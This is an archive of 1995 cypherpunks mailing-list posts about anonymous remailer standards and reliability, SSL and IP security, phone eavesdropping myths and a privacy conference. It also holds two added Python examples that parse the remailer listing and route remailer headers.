c2       remail@c2.org                    +++ - ++-+++  1:44:28  97.95%
syrinx   syrinx@c2.org                    ***  +++-*      30:09  97.85%
q        q@c2.org                         --+--+++-++   1:13:16  97.75%
flame    tomaz@flame.sinet.org             +***-******    59:14  97.51%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***+ *--**-*  1:38:08  96.72%
ideath   remailer@ideath.goldenbear.com   --------- --  2:04:17  95.12%
desert   remail@desert.xs4all.nl          .-___.-_.-   48:16:44  68.02%
rebma    remailer@rebma.mn.org            _.-_---      21:10:27  41.53%
extropia remail@extropia.wimsey.com                     5:04:09   6.34%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   Options and features

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.

   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.

   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.

   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.

   oldpgp
          Remailer does not like messages encoded with MIT PGP 2.6. Other
          versions of PGP, including 2.3a and 2.6ui, work fine.

   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.

   ksub
          Remailer always kills subject header, even in non-pgp mode.

   nsub
          Remailer always preserves subject header, even in pgp mode.

   latent
          Supports Matt Ghio's Latent-Time: option.

   cut
          Supports Matt Ghio's Cutmarks: option.

   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   special
          Accepts only pgp encrypted messages.

   ek
          Encrypt responses in reply blocks using Encrypt-Key:
          header.


Raph Levien
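
[Added example, not part of the original message and not premail's code: a parser for the two parts of the listing above (the $remailer{...} option lines and the ping table) that picks chain candidates by required options, uptime and latency. The rows are excerpted from the listing; the function names, the default thresholds and the reading of the latency column as [h:]mm:ss are assumptions.]

```python
import re

# Excerpt of the listing above, embedded so the example runs offline.
LISTING = r'''
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
$remailer{"xs4all"} = "<remailer@xs4all.nl> cpunk pgp hash latent cut post ek";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";

alumni   hal@alumni.caltech.edu           +****-*##* #     9:02  99.87%
penet    anon@anon.penet.fi               *+**+*+++-+*  1:40:22  99.99%
portal   hfinney@shell.portal.com         +***#-*##* #     6:53  99.85%
xs4all   remailer@xs4all.nl               **-*+++**+**    16:46  99.75%
usura    usura@replay.com                 *+-****+ ***    15:05  98.98%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***+ *--**-*  1:38:08  96.72%
extropia remail@extropia.wimsey.com                     5:04:09   6.34%
'''

CAP_RE = re.compile(r'^\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";$')
# The history column may contain spaces or be empty, so it is matched lazily
# and the latency and uptime columns are anchored at the end of the line.
ROW_RE = re.compile(r'^(\S+)\s+(\S+@\S+)\s(.*?)\s+(\d[\d:]*)\s+([\d.]+)%$')


def latency_seconds(text):
    """Convert '6:53' or '1:40:22' to seconds (assumed [h:]mm:ss)."""
    secs = 0
    for part in text.split(":"):
        secs = secs * 60 + int(part)
    return secs


def parse_listing(text):
    """Merge option lines and ping-table rows into one record per remailer."""
    remailers = {}
    for line in text.splitlines():
        line = line.strip()
        cap = CAP_RE.match(line)
        if cap:
            name, address, opts = cap.group(1), cap.group(2), cap.group(3).split()
            rec = remailers.setdefault(name, {"name": name})
            rec["address"] = address
            # "pgp." means the short name is the encryption key ID.
            rec["key_id_is_short_name"] = "pgp." in opts
            rec["options"] = {o.rstrip(".") for o in opts}
            continue
        row = ROW_RE.match(line)
        if row:
            rec = remailers.setdefault(row.group(1), {"name": row.group(1)})
            rec["history"] = row.group(3).strip()
            rec["latency_s"] = latency_seconds(row.group(4))
            rec["uptime"] = float(row.group(5))
    return remailers


def chain_candidates(remailers, need=("cpunk", "pgp"),
                     min_uptime=99.0, max_latency_s=3600):
    """Names of remailers with every needed option, best uptime first."""
    ok = [r for r in remailers.values()
          if "uptime" in r
          and set(need) <= r.get("options", set())
          and r["uptime"] >= min_uptime
          and r["latency_s"] <= max_latency_s]
    ok.sort(key=lambda r: (-r["uptime"], r["latency_s"]))
    return [r["name"] for r in ok]


if __name__ == "__main__":
    table = parse_listing(LISTING)
    print(chain_candidates(table))
    print(chain_candidates(table, min_uptime=95.0))
```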




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Mon, 6 Feb 95 06:27:43 PST
To: cypherpunks@toad.com
Subject: Change to the congressional contact list
Message-ID: <Pine.SV4.3.91.950206082059.3359A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


The congressional fax/phone list that I recently posted has at least one 
error in it. Senator Rod Grams' fax number is (202) 228-0956. The amended 
list will be available on the auto-responder in about 15 minutes. To get 
a copy:

Send a message to: skaplin@c2.org
With the subject: SEND FILE congresscritter.104

You should get it within two hours.

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Corbet <corbet@stout.atd.ucar.edu>
Date: Mon, 6 Feb 95 07:37:21 PST
To: cypherpunks@toad.com
Subject: Re: Vinge on PKE ? (really idiot savants)
Message-ID: <199502061537.IAA20779@atd.atd.ucar.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> These so-called "idiot savants" can easily factor
> 100 digit numbers.  The ability to solve such problems is not tied to IQ,
> as there are many such people with IQs of 150+ who cannot solve them.

Gee...such a person could do a pretty thorough job on a 512-bit RSA key.
How many of them do you suppose the NSA employs?

:-)

jon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 6 Feb 95 08:51:56 PST
To: cypherpunks@toad.com
Subject: Re:  Cooperation
Message-ID: <199502061651.IAA02758@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Nathan Zook <nzook@bga.com>
>    I agree that it is to our advantage to minimize the cooperation between
> remailers, for the following reasons:
> [...]
> But there is a major difference between active cooperation and agreeing to
> a standard.  Active cooperation is just that--something which cannot be
> automated, or which involves automated judgement decisions.  I claim that
> my ideas are merely standards.  A standard which might even be extendable
> into the dominions of a hostile government.

I see your point.  I tend to have something of a knee-jerk reaction
against proposals which put more responsibility into the hands of the
remailer operators, but as you say the mere promulgation of a standard
does not in itself require cooperation.  We have de-facto standards
right now, which is what makes chaining possible.

And from the technical point of view, the idea of remailers encrypting
between themselves seems to do no harm and could possibly make the
attacker's job potentially more difficult by reducing the amount of
information he has available.

One problem is that one remailer may not know about all of the others.
So to the extent that your proposal requires a registry of remailers, a
centralized service which keeps track of all remailers, I still have a
problem.  This is where my vision departs from those who see the
"remailer net" as an entity, and for whom the notion that remailers would
treat messages to each other specially is a natural assumption.  If you
would suggest that at each stage the message included not only the
address of the next remailer, along with the "payload" which was already
encrypted (by the sender) for that remailer, but in addition a key for
that remailer and a request to encrypt under that key, then I would feel
much better about it.  This way there is no need for the remailer to know
anything about whom it is sending to.

Likewise if we wanted to specify in the standard that messages could be
signed, that also would not imply collusion.  However to specify that
signatures must be checked would have some implications about acquiring
the necessary public keys through some means, and I don't think that
should be done.

I do like the idea of standards.  In fact I wonder if the current "mark
1" remailer command set shouldn't be documented as an Internet RFC.  It
has been in use for a couple of years now, evolving somewhat over that
time, and some twenty or thirty remailers have operated for some part of
that time following that spec.  It would also give a certain amount of
(undeserved, perhaps) respectability to remailer operators if there were
an actual numbered RFC which they were following.  And it does seem to me
that this kind of thing is exactly what the RFC's are for.  Certainly
there are a great many "minor" RFC's which are less followed than our
remailer standards.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLzZTfBnMLJtOy9MBAQFsRwIA4A5EzFZwJdEmSvcfMmnu+RCAEGYK56dg
y2LBawLdYn5FNcnvH6YkfCMHIcWURm1b6emEsw32FVH2m6ScAAH/iQ==
=F2+s
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jltocher@CCGATE.HAC.COM
Date: Mon, 6 Feb 95 11:17:09 PST
To: Cypherpunks@toad.com
Subject: To Bundle Or Not To Bundle?
Message-ID: <9501067920.AA792098085@CCGATE.HAC.COM>
MIME-Version: 1.0
Content-Type: text/plain


     From Edupage:
     
     TO BUNDLE OR NOT TO BUNDLE? THAT IS THE MICROSOFT QUESTION 
     One of the fears Microsoft rivals have is that Microsoft will build 
     directly into the Windows operating system various applications 
     software packages (such as encryption for financial processing over 
     the Internet), because customers would be reluctant to pay for 
     products that do more-or-less the same thing as an installed product 
     that they get "for free." Although it's unlikely that the government 
     would consider breaking Microsoft up into separate companies, it is 
     conceivable that it could force Microsoft to limit what it includes 
     with its operating systems. (The Economist 1/28-2/3/95 p.61)
     
John L. Tocher                THE CITY-a bounded infinity.   A labyrinth where 
JLTocher@earthlink.net        you are never lost. Your private map where every 
PGP:  CE 72 1A 11 07 47 35    block bears exactly the same number. Even if you 
35 9A C1 DE EA 64 21 BC 94    lose your way, you cannot go wrong.   --Kobo Abe
     
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 6 Feb 95 08:09:47 PST
To: cypherpunks@toad.com
Subject: Re: Camden New Jersey
In-Reply-To: <9502061348.AA14911@anon.penet.fi>
Message-ID: <9502061609.AA04485@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



What does this have to do with cryptography per se?

.pm

beacher says:
> 
> I thought nothing but armed robberies happened in Camden New Jersey.
> 
> Teenage Pirate To Pay $25,000, Loses BBS Equipment
> CAMDEN, NEW JERSEY, U.S.A., 1995 FEB 3 (NB) -- A teenage computer operator
> charged with illegally distributing hundreds of copyrighted commercial
> software programs has reached a settlement with Novell Inc., (NASDAQ: NOVL)
> and Microsoft Corp., (NASDAQ: MSFT).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <MFROOMKI@umiami.ir.miami.edu>
Date: Mon, 6 Feb 95 08:48:13 PST
To: cypherpunks@toad.com
Subject: CFP'95 Program/Registration Information (fwd)
Message-ID: <Pine.3.89.9502061157.A589326734-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Sun, 05 Feb 1995 12:43:36 -0500 
From: Carey Heckman <ceh@leland.Stanford.EDU>
To: Multiple recipients of list <cyberia-l@birds.wm.edu>
Subject: CFP'95 Program/Registration Information 

The Fifth Conference on Computers, Freedom and Privacy

Sponsored by:          * ACM SIGCOMM, SIGCAS, SIGSAC, and
                       * Stanford Law School

28 - 31 March 1995
San Francisco Airport Marriott Hotel
Burlingame, California

CONNECT WITH OTHERS WHO ARE DETERMINING HOW COMPUTERS AND TELECOMMUNICATIONS
WILL AFFECT YOUR FREEDOM AND PRIVACY... 

JOIN US AT CFP'95.

We have reached the crossroads of the Information Age.

No longer is the electronic frontier inhabited solely by a small band of 
technical pioneers sharing a common code of conduct. Computer and 
telecommunications technologies have become part of mainstream living, 
conversation, and politics. These changes compel us to reexamine the 
definition of our rights and the processes by which those rights are being 
defined. 

The Fifth Conference on Computers, Freedom and Privacy will assemble experts,
advocates and interested people from a broad spectrum of disciplines and
backgrounds in a balanced public forum to explore and better understand the
definition of our rights at this crossroads.

Participants will include people from the fields of computer science, law,
business, research, information, library science, health, public policy,
government, law enforcement, public advocacy, and many others.

Featured speakers include:

John P. Morgridge, Chairman, Cisco Systems
Esther Dyson, Release 1.0/EDVenture Holdings, Inc.
Roger W. Wilkins, Professor of History and American Culture at George 
	Mason University and commentator, National Public Radio
Margaret Jane Radin, Professor of Law, Stanford University
Willis H. Ware, RAND 

Some of the topics in the CFP'95 program include:

FREEDOM AND RESPONSIBILITY OF ELECTRONIC SPEECH -- Exploring recent
controversies in online free speech, including a Socratic forum
that will ask whether the Constitution can indeed be viewed through a
technologically transparent lens.

HIS MASTER'S VOICE... -- Probing the future for "net propaganda" from
governments, government officials, and politicians, and who will pay 
so whose message will get to whom.

STUDENT DATABASES: FOR EDUCATION AND FOR LIFE? -- Looking at how gaining the
benefits of nationwide information about K-12 students could also spell
serious privacy problems.

CAN THE NET SURVIVE COPYRIGHT? CAN COPYRIGHT SURVIVE THE NET? -- Delving
into the controversies surrounding copyright protection that throttles 
freedoms and copyright protection that protects just rewards for creativity.

INTELLIGENT TRANSPORTATION SYSTEMS: PAVING OVER PRIVACY -- Examining the
privacy implications of tracking and surveillance technologies now being
planned for vehicles and roadways nationwide.

"IT OUGHTA BE A CRIME..." -- Debating with law enforcement representatives
about who should set the rules for governing the net and when should bad 
manners become a crime.

WHEN DO THEY NEED TO KNOW 'WHODUNNIT'? -- Discussing the right time and
places for identified, anonymous, and pseudonymous transactions.

TRANSACTION RECORDS IN INTERACTIVE SERVICES: WHO WATCHES THE SERVERS? --
Looking at the issues raised by the collection of personal information
as part of the new interactive home entertainment, telecommunications,
and online services.

DEFINING ACCESS PARADIGMS: LIBRARIES, RURAL AREAS, AND INTERNATIONAL 
ASPECTS -- Evaluating the differing models of "open access" to Internet and
computer-mediated communications in the library, rural, and lesser-developed
country contexts.

THE CASE AGAINST COMPUTERS: A SYSTEMIC CRITIQUE -- Daring to discuss whether
computers may be doing our world more harm than good.

A NET FOR ALL: WHERE ARE THE MINORITIES? -- Examining how and to what degree
minority groups participate on the net and asking whether social class is
relevant to net participation or non-participation.

WHO OWNS THE LAW? -- Reviewing the debate over legal citation form and online
databases, and what it means to all of us.

CAN WE TALK LONG-DISTANCE? REMOVING IMPEDIMENTS TO SECURE INTERNATIONAL
COMMUNICATIONS -- Covering export and import controls, outright prohibitions,
and other technical and policy obstacles to secure international
communications.

The Fifth Conference on Computers, Freedom, and Privacy will also offer a 
number of in-depth tutorials on subjects including:

   *	Inside Washington: The New Congress and Secrets of Advocacy
   *	National ID Card Initiatives
   *	The Law of Fundamental Rights for Non-Lawyers 
   *	Everything You Need to Know to Argue About Cryptography
   *	Digital Activism
   *	Inside the World of Law Enforcement
   *	Intellectual Property for the Information Age 

FOR MORE INFORMATION ABOUT CFP'95:

Web:	http://www-techlaw.stanford.edu/CFP95.html
Gopher:	gopher://www-techlaw.stanford.edu/CFP95
FTP:	ftp://www-techlaw.stanford.edu/CFP95
Email:	Info.CFP95@forsythe.stanford.edu
Fax: 	(415) 548-0840
Call: 	(415) 548-9673


                                REGISTRATION


Please register for the conference by returning the conference
registration form along with the appropriate payment by any
method listed below. The registration fee includes conference
materials, three luncheons (Wednesday, Thursday, and Friday), two
banquets (Wednesday and Thursday) and evening receptions
(Tuesday, Wednesday, and Thursday).

Registration Fees are:

If mailed by:     February 24    March 14    after 14 March

Conference Fees      $335          $395          $445
Tutorial Fees:       $155          $185          $220

Registration is limited to 550 participants, so register early
and save!

By Mail:                                      By Fax:
(with Check or Credit Card)            (with Credit Card only)
CFP'95 Registration                    Send Registration Form
P.O. Box 6657                              (415) 548-0840
San Mateo, CA 94403                     Available 24 hours

By Phone:                            By Email (at your own risk*):
(with Credit Card only)                (with Credit Card only)
(415) 548-0840                  Register.CFP95@forsythe.stanford.edu
9 am to 5 pm Pacific Time

   *	Information for sending a PGP-encrypted registration available at
	http://www-techlaw.stanford.edu/CFP95.html and
	ftp://www-techlaw.stanford.edu/CFP95.

CFP'95 Scholarships:
The Fifth Conference on Computers, Freedom and Privacy will provide a limited 
number of full registration scholarships for students and other interested 
individuals. These scholarships will cover the full costs of registration, 
including three luncheons, two banquets, and all conference materials. 
Scholarship recipients will be responsible for their own lodging and travel 
expenses. Persons wishing to apply for one of these fully-paid registrations 
should contact CFP'95 Student Paper and Scholarship Chair, Gary Marx at: 
Gary.Marx@colorado.edu or call (303) 492-1697.

Hotel Accommodations:
The Fifth Conference on Computers, Freedom and Privacy will be held at the San 
Francisco Airport Marriott Hotel in Burlingame, CA. This facility is spacious 
and comfortable, and is easily accessible from the airport and surrounding 
cities. Because of the intensive nature of the conference, we encourage our 
attendees to secure their lodging at the conference facility. Special 
conference rates of $99/night, single or multiple occupancy, are available. 

*************************************************************************
* Our room block is limited and these conference rates are guaranteed   *
* only until February 17,1995, so we urge you to make your reservations *
* as early as possible.                                                 *
*************************************************************************

After February 17 but before March 15, the special conference rate will be
$110/night, single or multiple occupancy. When calling for reservations,
please be sure to identify the conference to obtain the conference rate. 
Hotel Reservations: (415) 692-9100 or (800) 228-9290 or fax (415) 692-8016.

Official Airlines:
Special convention airfare discounts have been arranged on American and United 
Airlines. Bungey Travel, (800) 286-4391 or (415) 325-5686 or fax (415) 321-5309,
will be happy to assist you in any manner. Please identify yourself as 
attending the Computers, Freedom, and Privacy Conference and you will 
automatically receive a 5% discount off nonrefundable discounted US tickets or 
10% off of all unrestricted US coach fares.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trool the Red Adept" <cdbunch@bansai.ucs.uoknor.edu>
Date: Mon, 6 Feb 95 09:58:33 PST
To: strick@yak.net
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <9502060202.AA03281@snark.imsi.com>
Message-ID: <9502061152.ZM18057@bansai.ucs.uoknor.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Feb 5,  9:02pm, Perry E. Metzger wrote:

> There is also SSL, which is what the Netscape people are pushing --
> stands for Secure Sockets Layer.
>
>
>-- End of excerpt from Perry E. Metzger

  Of course SSL is not really a solution.  First it requires that the server
have a well-known RSA public key.  It is also not an optional service so it
requires new well-known ports for the secure services (such as https).  Also
for some strange reason it uses two session keys (both generated at the client
end) one for client->server and another for server->client.  Not to mention I
distrust any protocol with provisions for sending bits of my key in the clear.
	Clinton


-- 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 6 Feb 95 12:13:17 PST
To: cypherpunks@toad.com
Subject: Re:  Cooperation
In-Reply-To: <199502061651.IAA02758@jobe.shell.portal.com>
Message-ID: <199502062011.MAA19947@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Hal <hfinney@shell.portal.com>

   I do like the idea of standards.  In fact I wonder if the current "mark
   1" remailer command set shouldn't be documented as an Internet RFC.  

If an RFC is issued, I personally would like to clean up the syntax
and get the remailer operators to upgrade accordingly.

In particular, I chose Request-Remailing-To: as a purposefully obtuse
experimental name.  It deserves to die.

My preferences are for the following:

Anon-Send-To: for anonymized email
Send-To: for normal forwarded email
Anon-Post-To: for anonymized Usenet posting
Post-To: for a regular mail-to-Usenet gateway

I want to capture the distinction between Usenet and email as well as
to support plain forwarding of text for people with connectivity
problems.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 6 Feb 95 12:25:10 PST
To: cypherpunks@toad.com
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <9502061025.AA03724@snark.imsi.com>
Message-ID: <199502062023.MAA19967@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Perry E. Metzger" <perry@imsi.com>

   Eric Hughes says:
   > Perry advocates IPSP as an almost-panacea for Internet security.  I
   > disagree.

   Well, no; it doesn't fix things like mail for which the data needs to
   be protected but not the link. 
   
In the case of email, there's the same discrepancy I pointed out
earlier -- the machine or filesystem boundary is not the same as the
trust boundary.  This will happen for email as well as more live and
online communications needs.

   TIA is sort of a short term hack people are using to get around having
   to have their administrators manage SLIP or PPP properly; I suspect
   this difficulty will vanish with time.

I agree with you that this particular example may be short lived, but
you appear to have ignored the more fundamental point I was making.
Namely, the existence of communications proxies which _change_ the
level of abstraction will be with us forever.  The TIA unix end
switches from TCP-to-the-world to IP-to-the-PC.  That's a level
switch.

   IP is ultimately designed to be a proxy protocol that will work over
   anything -- stuff like TIA simply gets around temporary mental
   difficulties among providers in seeing things that way...

I'm not saying that IP proxies won't exist.  What I am saying is that
other forms of proxying will also exist.  Not all policies will be
able to be enforced at the IP level.  As soon as you want security
policy to apply to non-IP abstractions, IPSP is no longer primary,
even if it's still involved.

Firewall policies are a prime example of security policy enforced at
the TCP and UDP levels, with access control by port number.  External
firewalls, a class that includes packet laundries, web proxies, and
IRC anonymizers, will not for the most part operate at the IP level.

It's certain that IP security will greatly increase the overall
security of the Internet.  I'm not advocating its removal but rather
the acknowledgement that higher (and lower) level abstractions will
require their own cryptography.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.sf.ca.us>
Date: Mon, 6 Feb 95 12:29:02 PST
To: cypherpunks@toad.com
Subject: RE: Firewall chips
Message-ID: <199502062028.MAA25818@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain




>> Actually, there is a germ of truth in this.  On older phones
>>(don't know if  this works on newer electronic phones) when the
>>handset is 'on-hook' a  switch opens and breaks the voice
>>circuit. This of course only works for DC circuits.  If you drive
>>that same circuit with an AC signal . . .

>There's another angle I may have mentioned before.  Many 
>electronic phones come with a ``feature'' that allows you to 
>call home, produce an electronic tone and eavesdrop on your own
>house.  When the tone is sounded, the ringing stops (or never
>starts) and the phone goes into ``off hook'' mode (i.e., the
>microphone in the mouthpiece is turned on).

>Even if you did not buy this feature when you bought your phone,
>it is still there, just waiting for that electronic tone.  You 
>can't produce it, because you didn't buy the doohickey, but anyone
>with such a doohickey can call your house and listen in. . .


> S a n d y

>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 Devices of this type are known generically as "infinity
transmitters." They will not function anywhere the phone network is
run by a digital (4ESS or better) switch.

 In a modern switch, the ringing you hear is being generated by the
switch, the switch is simultaneously ringing the number you dialed,
however the two are not physically connected. The actual connection
is not made until the far end answers, this was implemented to
stop various types of fraud, and unauthorized eavesdropping.


Brian D Williams
Cypherpatriot

 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 6 Feb 95 12:48:48 PST
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: dna ink
Message-ID: <v0151010eab5c172d0d6e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 PM 2/5/95, Dan Harmon wrote:
>I just saw an item on CNN about a company in LA called Art Guard.  It
>sells an ink that is created using your dna as a protection against
>forged signatures.

Why not just sign in blood?


-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <rogaski@phobos.lib.iup.edu>
Date: Mon, 6 Feb 95 09:56:05 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: dna ink
In-Reply-To: <Pine.3.89.9502052222.B22385-0100000@Joyce-Perkins.tenet.edu>
Message-ID: <199502061755.MAA14493@phobos.lib.iup.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From the node of Dan Harmon:
: 
: 
: I just saw an item on CNN about a company in LA called Art Guard.  It 
: sells an ink that is created using your dna as a protection against 
: forged signatures.
: 
: Interesting.
: 
: Dan
: 
: 

Faustus ... Faustus ... Why do you delay?

- -----
Doc					      doc@phobos.lib.iup.edu
aka Mark Rogaski			      http://www.lib.iup.edu/~rogaski/

Disclaimer:  You would probably be hard-pressed to find ANYONE who agrees
             	with me, much less my university or employer...

   [finger fllevta@oak.grove.iup.edu for PGP Public Key and Geek Code v2.1]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzZicx0c4/pqJauBAQGgqQQAqOgSZNxJsR3UdEqASFUQ39divPhvbHnk
AIzG+Jut+CHm0DE+CvMb9ZHzPI6JTQt5gYSuN9OSqHkZ82uxv5gPJOvxHq3PXYoD
iaKkxnXPilWImuVHOUHVBpaCibfzdM4ZxYsj0bJSA8juB5G29LDI/3JeUvo8eJFX
A+wWkjbawIc=
=bpge
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Mon, 6 Feb 95 10:09:51 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <9502061025.AA03724@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950206130709.20818A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Feb 1995, Perry E. Metzger wrote:

> Remember, by the way, that PPP is far cheaper per customer than shell
> accounts, even though moronic providers right now don't make it look
> that way.

PPP/SLIP is currently not cheaper per customer - if you figure in the 
time your help desk staff put in over the first couple of weeks of a new 
customer coming on line.  Many people who have barely ever used a BBS are 
deciding they "need their internet connection" and going SLIP/PPP even 
where a shell account would do most of what they want.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Mon, 6 Feb 95 10:14:00 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: Cooperation
In-Reply-To: <199502061154.DAA11069@netcom15.netcom.com>
Message-ID: <Pine.SUN.3.91.950206131048.20818B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Feb 1995, Timothy C. May wrote:

> Yes! Standards are not collusion. In fact, standards can lessen the
> amount of ad hoc contact needed between remailer operators, and thus
> reduce somewhat the prospects for compromise and collusion.

If someone adds the secure coin-flip exchange between chain neighbors to
my Dining Cryptographers IRC client, all remailer operators can go on IRC 
and anonymously discuss the standards so that no cabals can form ;)

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 6 Feb 95 13:15:06 PST
To: cypherpunks@toad.com
Subject: Re: Cooperation
In-Reply-To: <9502062043.AA05429@snark.imsi.com>
Message-ID: <199502062113.NAA20075@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   Eric says:
   > In particular, I chose Request-Remailing-To: as a purposefully obtuse
   > experimental name.  It deserves to die.

   From: "Perry E. Metzger" <perry@imsi.com>

   I'd say that it would work far better if things were changed to MIME
   formats. You would send a message by recursively encapsulating your
   message to be remailed inside a MIME message. Simple and clean...

That's fine.  I like MIME, but the issue is cleaning up the existing
remailers, none of which use MIME, and the chaining scripts, none of
which do either.

Getting everybody to support Anon-Send-To: in addition to
Request-Remailing-To: is a very simple and straightforward fix for an
acknowledged syntactic inanity.

Eric
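
A dispatcher for the four header names proposed in this thread, with Request-Remailing-To: accepted as a legacy alias of Anon-Send-To:, as an added example that is not code from any remailer discussed on the list. The header allowlist, the destination checks, the sample message and all function names are assumptions of this example.

```python
import re
from email import message_from_string
from email.message import Message

# Routing header -> (transport, anonymize). The four proposed names come from
# the thread; Request-Remailing-To is treated as an alias of Anon-Send-To.
DIRECTIVES = {
    "anon-send-to": ("mail", True),
    "request-remailing-to": ("mail", True),
    "send-to": ("mail", False),
    "anon-post-to": ("news", True),
    "post-to": ("news", False),
}

# Assumption: when anonymizing, only these headers survive. An allowlist fails
# closed, so an unexpected identifying header is dropped rather than leaked.
KEEP_WHEN_ANON = {"subject", "mime-version", "content-type",
                  "content-transfer-encoding"}

# Assumption: one plain address or one newsgroup name per directive.
MAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")
NEWS_RE = re.compile(r"[a-z0-9+_-]+(\.[a-z0-9+_-]+)+")


class DirectiveError(ValueError):
    """Raised when a message carries no usable routing directive."""


def dispatch(raw):
    """Return (transport, anonymize, outgoing_message) for one raw message."""
    msg = message_from_string(raw)
    found = [(n.lower(), v.strip()) for n, v in msg.items()
             if n.lower() in DIRECTIVES]
    # Two directives would make the route ambiguous, so refuse instead of guessing.
    if len(found) != 1:
        raise DirectiveError("expected one routing header, got %d" % len(found))
    name, dest = found[0]
    transport, anonymize = DIRECTIVES[name]
    pattern = MAIL_RE if transport == "mail" else NEWS_RE
    # fullmatch rejects recipient lists, folded values and embedded newlines.
    if not pattern.fullmatch(dest):
        raise DirectiveError("bad destination for %s" % name)

    out = Message()
    for header, value in msg.items():
        key = header.lower()
        if key in DIRECTIVES or key in ("to", "newsgroups"):
            continue  # routing headers are consumed, never forwarded
        if anonymize and key not in KEEP_WHEN_ANON:
            continue  # drops From, Message-ID, Received and anything unknown
        out[header] = value
    out["To" if transport == "mail" else "Newsgroups"] = dest
    out.set_payload(msg.get_payload())  # assumes a single-part text body
    return transport, anonymize, out


# Constructed sample message, not taken from the list archive.
SAMPLE = (
    "From: alice@example.com\n"
    "To: remailer@example.net\n"
    "Message-ID: <constructed-1@example.com>\n"
    "Subject: hello\n"
    "Anon-Send-To: bob@example.org\n"
    "\n"
    "body text\n"
)

if __name__ == "__main__":
    transport, anonymize, outgoing = dispatch(SAMPLE)
    print(transport, anonymize)
    print(outgoing.as_string())
```
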




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 6 Feb 95 10:30:41 PST
